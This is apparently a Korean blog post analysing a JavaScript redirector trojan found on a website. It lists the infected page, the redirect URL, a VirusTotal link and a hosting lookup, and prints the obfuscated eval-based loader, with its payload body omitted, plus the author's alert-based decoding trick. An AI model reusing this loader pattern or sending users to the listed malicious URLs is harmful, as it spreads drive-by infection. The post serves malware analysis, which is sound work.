Trojan.JS.Redirector.zf [Kaspersky]
발견지 : http://gotosite.home.xs4all.nl/b&b/left.htmx (Trojan.JS.Redirector.zf - Kaspersky)
-> http://deviced.com/vanilla/8BztG4W3.phx
바이러스 토탈 : https://www.virustotal.com/en/file/160b039d3ffc826fd73313780d61fb6f7e23d92da96dc40608e34cda2ab2c6d8/
우연히 돌아다니다가 발견해서 끄적끄적 해본다.....
최종 접속 시 왜 ok 라는 시그널만 내보낼까 궁금하다................
쿠키값때문인가??
아시는 분 계시면 알려주세요~ : )
e=eval;v="0"+"x";a=0;z="y";try{a*=2}catch(q){a=1}if(!a){try{document["\x62od"+z]++}catch(q){a2="_"}z=[생략]"
["split"](a2);za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-4-3);}zaz=za;e(zaz);}
za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-4-3);}zaz=za;e(zaz);
// 계산식
za="";for(i=0;i<z.length;i++){za+=String["fromCharCode"](e(v+(z[i]))-4-3);}zaz=za;alert(zaz);
// 출력
Deviced.com | Deviced IP Lookup (IP: 84.38.68.117)
Hostname: | deviced.com |
---|---|
IP Address: | 84.38.68.117 |
Host of this IP: | vserver2407.vserver-on.de |
Organization: | ispOne business GmbH |
ISP: | ispOne business GmbH |
City: | - |
Country: | Germany |
State: | - |
Timezone: | - |
Local Time: | - |